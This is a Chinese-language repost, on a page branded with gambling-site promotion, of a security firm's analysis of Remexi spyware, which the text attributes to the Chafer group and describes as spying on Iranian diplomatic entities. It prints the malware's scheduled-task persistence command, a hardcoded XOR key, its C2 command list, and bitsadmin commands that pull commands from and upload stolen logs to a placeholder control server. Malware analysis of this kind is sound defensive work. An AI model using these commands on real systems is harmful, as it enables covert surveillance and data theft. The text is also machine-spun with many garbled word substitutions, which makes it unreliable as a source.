Chafer运用Remexi歹意软件监控伊朗相干外交机构 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

Chafer运用Remexi歹意软件监控伊朗相干外交机构

申博_新闻事件 申博 153次浏览 已收录 0个评论

择要

2018年秋 Kaspersky研究人员剖析了进击伊朗交际相干机构的监控运动。进击者运用Remexi的更新版正本提议进击,从受害者的散布来看应该是一同国内的网络监控运动。歹意软件与名为Chafer的APT构造相干。

该歹意软件能够盗取键盘输入、截屏、浏览器相干的cookie、汗青记录等数据。进击者在客户端和服务器端都异常依靠微软的手艺:木马运用规范的Windows对象像Microsoft Background Intelligent Transfer Service (BITS) bitsadmin.exe来吸收敕令和盗取数据。进击者运用的C2是基于IIS的,运用.asp手艺来操纵受害者的HTTP要求。

Remexi开辟者运用Windows MinGW 情况的C语言和GCC编译器来开辟。进击者运用Windows情况中的Qt Creator IDE。歹意软件还运用计划义务、Userinit、运转HKLM hive中的注册表等多种驻留机制。分歧的样本还运用XOR和RC4加密和分歧的长密钥。随机的密钥中运用了salamati,在波斯语中是康健的意义。

Kaspersky安全产品检测到歹意软件是木马Trojan.Win32.Remexi和Trojan.Win32.Agent。本文是依据2018年11月的剖析申报。

手艺剖析

研究人员剖析进击运动中运用的重要对象是Remexi歹意软件的更新版本。最新的模块编译时候是2018年3月。开辟者运用的是MinGW 情况下的Windows GCC编译器。

在二进制文件中,编译器留下了一些援用C源文件模块名的线索,包孕operation_reg.c、thread_command.c、thread_upload.c。歹意软件含有许多事情线程,卖力完成分歧的义务,包孕C2敕令剖析和数据盗取。Remexi运用Microsoft Background Intelligent Transfer Service (BITS)机制来经由过程HTTP与C2举行通讯。

滋生流传

现在还没有明白的证据注解Remexi歹意软件的流传体式格局。值得一提的是研究人员发明了Remexi main模块实行和AutoIt剧本编译为PE的干系,研究人员以为是PE开释的歹意软件。开释器运用FTP和硬编码的凭据来吸收payload。停止剖析时,FTP已没法接见了,因而没法进一步剖析。

歹意软件特性

Remexi有许多特性许可其网络键盘输入、截图、盗取凭据、上岸和浏览器汗青,实行长途代码。加密含有硬编码KEY的XOR和预界说了暗码的RC4来加密受害者数据。

Remexi含有多个分歧的母可,个中包孕设置装备摆设解密、剖析,和分歧的监控和隶属函数线程。Remexi开辟者看似依靠于正当的Microsoft对象,详细见下表。

Chafer运用Remexi歹意软件监控伊朗相干外交机构

驻留

驻留模块基于计划义务和体系注册表,分歧的操纵体系版本机制分歧。在老版的Windows操纵体系版本中,main模块events.exe运转着编纂过的XPTask.vbs Microsoft样本脚正本建立每周的计划义务。对新版本的操纵体系,events.exe会建立task.xml:

Chafer运用Remexi歹意软件监控伊朗相干外交机构

然后运用下面的敕令来建立windows计划义务:

schtasks.exe /create /TN \"Events\\CacheTask_<user_name_here>" /XML \"<event_cache_dir_path>t /F"

在体系注册表级,模块经由过程到场以下注册表来完成驻留:

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit

敕令

一切来自C2的敕令都起首生存在隶属文件中,然后加密生存在体系注册表中。有自力线程会解密和实行注册表中的文件。敕令及形貌以下:

· search 搜刮相干的文件

· search&upload 将对应的文件加密并添加到给命名的上传目次中

· uploadfile 将提到的途径加密并添加到给命名的上传目次中

· uploadfolder 将提到的目次加密并添加到给命名的上传目次中

· shellexecute 用cmd.exe实行吸收的敕令

· wmic 用wmic.exe实行吸收的敕令

· sendIEPass 将一切网络的数据加密和到场到要上传到C2的文件中

· uninstall 移除文件、目次和BITS义务

加密

————————————-

申博网络安全巴士站

申博-网络安全巴士站是一个专注于网络安全、系统安全、互联网安全、信息安全,全新视界的互联网安全新媒体。

————————————-

为了解密设置装备摆设数据,歹意软件会运用25个字符的key举行XOR加密,而且分歧的样本运用分歧的key waEHleblxiQjoxFJQaIMLdHKz。RC4文件加密依靠于Windows 32 CryptoAPI。

设置装备摆设

config.ini是歹意软件生存加密的设置装备摆设数据的文件。含有以下分歧的域:

Chafer运用Remexi歹意软件监控伊朗相干外交机构

Chafer运用Remexi歹意软件监控伊朗相干外交机构

Main模块(events.exe)

在搜检了歹意软件是不是装置后,main模块会运用Microsoft 规范对象expand.exe和下面的参数来解压HCK.cab:

 expand.exe -r \"<full path to HCK.cab>\" -f:* \"<event_cache_dir_path>\\\"

然后用硬编码的25字节XOR key来解密config.ini文件,每一个样本的XOR key是分歧的。然后为键盘和鼠标handlekeys()和MouseHookProc()设置hook :

ID Thread description

1 用bitsadmin.exe对象来从C2猎取敕令并生存为文件和体系注册表

2 用RC4和硬编码的key来从注册表解密敕令,并实行

3 将截屏从剪贴板移动到\Cache005子目次,并从剪贴板将Unicode文本移动到log.txt,并用“salamati” key举行XOR操纵

4 将截屏移动到\Cache005子目次,并含有captureScreenTimeOut和captureScreenTimeOut频次

5 搜检网络连接、解密并发送网络的日记

6 消除鼠标和键盘的hook,移除bitsadmin义务

7 搜检歹意软件的事情目次巨细是不是凌驾限定的值

8 网络受害者的凭据、接见的网站缓存、解密的Chrome上岸数据、和Firefox的数据库,含有cookies、keys、下载等

歹意软件运用下面的敕令从C2吸收数据:

bitsadmin.exe /TRANSFER HelpCenterDownload /DOWNLOAD /PRIORITY normal <server> <file>
http://<server_config>/asp.asp?ui=<host_name>nrg-<adapter_info>-<user_name>

运动日记模块Splitter.exe

该模块是main线程挪用的,以猎取windows的截屏。

Chafer运用Remexi歹意软件监控伊朗相干外交机构

除以动态链接库和对应的输出函数情势运用辅佐模块外,开辟者决议运用events.exe和下面的参数来开启自力的运用:

Chafer运用Remexi歹意软件监控伊朗相干外交机构

数据盗取

数据盗取是经由过程bitsadmin.exe对象完成的。BITS机制从Windows XP体系到以后Windows 10版本中都有,是为了建立下载和上传义务,重如果为了更新操纵体系。下面的敕令是用来从受害者中盗取数据的:

bitsadmin.exe /TRANSFER HelpCenterUpload /UPLOAD /PRIORITY normal "<control_server>/YP01_<victim_fingerprint>_<log_file_name>" "<log_file_name>"

受害者

依据Remexi变种的目的用户剖析,发明重如果伊朗的IP地点。个中一些是位于伊朗的交际机构实体。

归属

研究人员剖析发明Remexi歹意软件与APT构造Chafer有关。个中一个加密的密钥是salamati,该单词在波斯语是康健的意义。剖析与歹意软件作者相干的证据发明,在.pdb途径中含有一个Windows用户名Mohamadreza New。在FBI网站在通缉两个伊朗犯罪分子Mohammad Reza,但这也多是个一般的名字,以至是个毛病的标识。

结论

Chafer APT构造自2015年最先活泼,依据编译的时候戳和C2注册剖析,研究人员以为该构造的运动时候能够更早。总的来说,Chafer的重要进击目的位于伊朗,虽然也能够包罗位于中东的其他国家。


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明Chafer运用Remexi歹意软件监控伊朗相干外交机构
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址